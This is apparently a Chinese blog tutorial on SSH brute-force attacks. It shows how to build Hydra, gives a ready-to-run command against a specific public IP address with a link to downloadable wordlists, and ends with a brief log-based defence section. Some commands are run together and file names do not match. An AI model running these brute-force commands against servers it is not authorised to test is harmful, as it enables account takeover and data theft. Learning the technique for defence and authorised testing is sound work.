在企业生产环境中,黑客攻击Linux服务器、网站、数据库等,最常用的攻击方式、手段主要有:SQL注入攻击、DDOS攻击、CC网页攻击、SYN Flood攻击、勒索病毒、上传木马、XSS跨站攻击、暴力破解等。其中,暴力破解攻击(Linux服务器)方式是黑客最喜欢的攻击方式之一。
暴力破解是指使用工具,批量、并发的读取用户名字典和密码字典,尝试以SSH协议远程试探登录Linux服务器的用户名和密码。一旦被黑客拿到服务器的用户名和密码,就会导致服务器所有的数据都被泄露。
使用Hydra工具模拟攻击Linux服务器
Hydra是一款开源的暴力破解工具,是著名的THC组织对外开源的。Kali操作系统会默认安装Hydra,下面我们介绍如何使用Hydra模拟攻击Linux服务器。
下载Hydra
首先从官网下载软件,我们把它放在/usr/src/路径下:
$ wget -c https://www.thc.org/releases/hydra-8.1.tar.gz -P usr/src/复制
然后解压工具:
$ cd usr/src$ tar -zxvf thc-hydra-master.tar.gz复制
上述命令中,tar参数分别是指:
-z gzip压缩格式;
-x extract解压;
-v verbose详细显示;
-f file文件属性。
安装Hydra
Hydra是使用C语言开发的软件程序,我们下载解压后的是源代码文件,还需要将其编译成二进制文件。如下操作:
# 预编译$ ./configure --prefix=/usr/local/hydra/# 编译$ make# 安装$ make install#将Hydra程序bin目录添加到系统path环境变量中$ cat >>/etc/profile<<EOFexport PATH=\$PATH:/usr/local/hydra/bin/EOF#使环境变量生效$ source etc/profile#检查是否安装成功$ hydra复制
若出现如下图所示内容,则表示安装成功:
模拟攻击
我们使用Hydra模拟攻击Linux服务器(假设服务器IP地址是120.92.111.191),使用如下命令:
$ hydra -L users.txt -P passwd.txt -t 4 -vV 120.92.111.191 ssh复制
上述命令中的users.txt和passwd.txt分别是用户名字典文件和密码字典文件,大家可以到(https://pan.baidu.com/s/1r6Umol2jkaHGZgygqw7Fvg)下载,提取码:kp4f
命令参数:
-L,指定用户名字典文件;
-P,指定密码字典文件;
-t,指定攻击并发线程数;
-vV 详细显示攻击过程;
ssh,指定攻击协议,以SSH方式试探。
程序会一直运行到成功获取被攻击机器的账号。
防御
作为运维人员,当服务器遭受到暴力破解攻击时,需要找到相应的方法去防御。首先需要找到系统的安全日志,对日志文件进行分析,可以通过awk,sed,grep命令分析黑客的IP地址。找出哪些IP地址攻击次数最多,然后将其IP封禁掉,加入黑名单。
此外,还需要查找服务器漏洞,弥补漏洞,防止再次遭到攻击。
关于系统安全日志的位置,可以通过以下方式查找:
find -name "*secure*"find / -name "*secure*" | grep log/var/log/secure复制
